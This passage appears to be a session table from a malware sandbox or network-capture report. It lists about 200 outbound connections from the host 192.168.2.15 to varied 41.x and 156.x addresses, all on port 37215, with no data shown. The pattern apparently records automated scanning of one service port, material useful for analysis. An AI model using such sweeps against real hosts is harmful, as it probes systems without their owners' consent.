                                                                            16339192.168.2.155795041.164.50.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16340192.168.2.155732441.29.140.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16341192.168.2.155880441.187.100.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16342192.168.2.155274641.143.71.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16343192.168.2.153326641.144.72.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16344192.168.2.155833241.138.158.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16345192.168.2.153301441.144.213.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16346192.168.2.153442841.167.114.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16347192.168.2.155679841.95.82.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16348192.168.2.154052441.245.243.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16349192.168.2.154118441.215.104.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16350192.168.2.153825641.130.52.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16351192.168.2.153765241.54.37.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16352192.168.2.154224041.74.206.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16353192.168.2.155172441.46.140.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16354192.168.2.155821441.196.199.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16355192.168.2.153556041.131.40.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16356192.168.2.155067441.9.214.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16357192.168.2.156012841.209.161.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16358192.168.2.156022041.174.13.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16359192.168.2.154231641.132.148.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16360192.168.2.154437241.0.33.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16361192.168.2.155596241.13.66.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16362192.168.2.153398641.160.184.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16363192.168.2.153723241.3.150.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16364192.168.2.156053441.57.116.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16365192.168.2.155481641.183.93.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16366192.168.2.155303841.45.34.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16367192.168.2.156027841.21.2.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16368192.168.2.155980841.102.43.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16369192.168.2.155904841.154.255.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16370192.168.2.155876841.105.217.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16371192.168.2.155360641.202.172.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16372192.168.2.155702641.12.108.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16373192.168.2.153877841.162.253.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16374192.168.2.154999241.131.19.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16375192.168.2.154550641.70.174.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16376192.168.2.154919641.53.244.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16377192.168.2.155982241.59.118.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16378192.168.2.155570641.12.76.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16379192.168.2.154948041.143.131.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16380192.168.2.153854041.143.142.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16381192.168.2.155962841.212.32.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16382192.168.2.155371641.248.4.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16383192.168.2.156008841.198.191.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16384192.168.2.154053441.56.30.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16385192.168.2.154986841.218.12.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16386192.168.2.154827441.0.59.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16387192.168.2.155218441.232.57.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16388192.168.2.153511441.75.122.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16389192.168.2.155015641.46.197.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16390192.168.2.155454841.156.163.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16391192.168.2.155133441.179.214.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16392192.168.2.154224441.101.232.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16393192.168.2.154589841.27.162.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16394192.168.2.153611241.81.188.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16395192.168.2.153444241.33.177.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16396192.168.2.154419441.80.100.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16397192.168.2.154435441.177.149.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16398192.168.2.154031641.21.50.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16399192.168.2.154750041.131.236.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16400192.168.2.154891641.33.251.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16401192.168.2.155020041.79.160.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16402192.168.2.153434641.139.210.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16403192.168.2.154914641.95.238.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16404192.168.2.155104641.172.140.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16405192.168.2.156040041.5.187.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16406192.168.2.154358241.21.192.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16407192.168.2.155426641.96.50.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16408192.168.2.153526441.194.123.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16409192.168.2.155442041.203.96.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16410192.168.2.155440041.70.171.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16411192.168.2.155715041.143.82.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16412192.168.2.155637841.152.177.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16413192.168.2.155730641.231.156.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16414192.168.2.155160041.53.161.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16415192.168.2.154352241.183.7.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16416192.168.2.154915641.27.94.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16417192.168.2.154855041.242.235.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16418192.168.2.153470441.165.8.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16419192.168.2.156011641.137.239.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16420192.168.2.153285441.239.41.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16421192.168.2.154826041.242.148.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16422192.168.2.154287841.194.26.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16423192.168.2.156007641.113.62.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16424192.168.2.153722641.196.224.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16425192.168.2.154355641.224.167.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16426192.168.2.155367841.15.44.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16427192.168.2.153617841.224.140.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16428192.168.2.154587441.102.35.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16429192.168.2.154481441.126.160.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16430192.168.2.155144041.95.162.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16431192.168.2.153809441.249.103.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16432192.168.2.155177241.22.1.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16433192.168.2.155734041.28.169.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16434192.168.2.155844241.63.201.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16435192.168.2.153808441.119.106.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16436192.168.2.155490641.204.65.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16437192.168.2.153937041.145.72.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16438192.168.2.154404841.104.28.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16439192.168.2.154873241.0.95.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16440192.168.2.155553041.219.168.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16441192.168.2.154227041.53.231.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16442192.168.2.155146041.76.0.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16443192.168.2.154905041.195.130.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16444192.168.2.153838241.51.71.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16445192.168.2.154876441.47.82.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16446192.168.2.155959441.45.38.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16447192.168.2.155758441.226.248.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16448192.168.2.153956241.29.68.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16449192.168.2.154351841.33.13.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16450192.168.2.154878441.108.87.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16451192.168.2.155492441.54.223.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16452192.168.2.154391841.102.19.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16453192.168.2.155513841.75.74.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16454192.168.2.155588241.249.149.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16455192.168.2.155014241.74.232.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16456192.168.2.153495041.68.191.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16457192.168.2.155530441.206.136.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16458192.168.2.154941041.4.53.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16459192.168.2.154397841.174.66.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16460192.168.2.154897641.58.174.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16461192.168.2.155123641.62.182.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16462192.168.2.154649041.8.174.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16463192.168.2.1534494156.107.181.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16464192.168.2.1536772156.73.44.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16465192.168.2.1556938156.131.159.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16466192.168.2.1558142156.239.250.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16467192.168.2.1546012156.101.120.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16468192.168.2.1560562156.253.168.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16469192.168.2.1541014156.213.95.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16470192.168.2.1539964156.12.211.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16471192.168.2.1544478156.246.48.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16472192.168.2.1554536156.64.120.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16473192.168.2.1546306156.121.119.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16474192.168.2.1554236156.200.35.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16475192.168.2.1549334156.234.44.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16476192.168.2.1556160156.79.23.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16477192.168.2.1546574156.247.205.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16478192.168.2.1549354156.101.162.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16479192.168.2.1555310156.255.199.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16480192.168.2.1534286156.157.125.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16481192.168.2.1548568156.34.192.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16482192.168.2.1533592156.207.195.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16483192.168.2.1555364156.231.49.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16484192.168.2.1557370156.225.211.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16485192.168.2.1542534156.226.99.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16486192.168.2.1560790156.5.214.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16487192.168.2.1544524156.183.150.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16488192.168.2.1555910156.31.92.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16489192.168.2.1550220156.202.187.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16490192.168.2.1534060156.173.60.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16491192.168.2.1556164156.244.197.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16492192.168.2.1550788156.81.124.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16493192.168.2.1535166156.5.99.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16494192.168.2.1553866156.203.35.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16495192.168.2.1560558156.198.140.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16496192.168.2.1540136156.169.253.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16497192.168.2.1559914156.136.16.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16498192.168.2.1559040156.138.158.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16499192.168.2.1558532156.131.152.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16500192.168.2.1545814156.17.243.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16501192.168.2.1533414156.0.21.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16502192.168.2.1554492156.3.39.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16503192.168.2.1546132156.59.240.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16504192.168.2.1554634156.84.74.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16505192.168.2.1543046156.16.102.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16506192.168.2.1547784156.66.4.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16507192.168.2.1535320156.254.31.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16508192.168.2.1542972156.170.78.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16509192.168.2.1536676156.177.198.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16510192.168.2.1555362156.134.167.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16511192.168.2.1538226156.12.192.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16512192.168.2.1544088156.187.45.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16513192.168.2.1547562156.153.142.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16514192.168.2.1534712156.220.77.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16515192.168.2.1555824156.136.189.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16516192.168.2.1549570156.196.27.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16517192.168.2.1558946156.59.163.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16518192.168.2.1552030156.139.95.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16519192.168.2.1538622156.127.43.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16520192.168.2.1551140156.252.15.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16521192.168.2.1546372156.63.167.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16522192.168.2.1554146156.119.85.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16523192.168.2.1542172156.165.81.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16524192.168.2.1554812156.157.51.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16525192.168.2.1558954156.178.37.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16526192.168.2.1537892156.198.82.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16527192.168.2.1555384156.81.1.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16528192.168.2.1548928156.73.229.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16529192.168.2.1543492156.103.237.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16530192.168.2.1559844156.205.170.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16531192.168.2.1555298156.227.148.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16532192.168.2.1553032156.79.164.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16533192.168.2.1547994156.97.232.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16534192.168.2.1543368156.77.195.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16535192.168.2.1548430156.54.59.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16536192.168.2.1551958156.19.113.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16537192.168.2.1554970156.219.239.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16538192.168.2.1546550156.103.182.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16539192.168.2.1560300156.223.109.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16540192.168.2.1542798156.39.228.25437215
                                                                            TimestampBytes transferredDirectionData


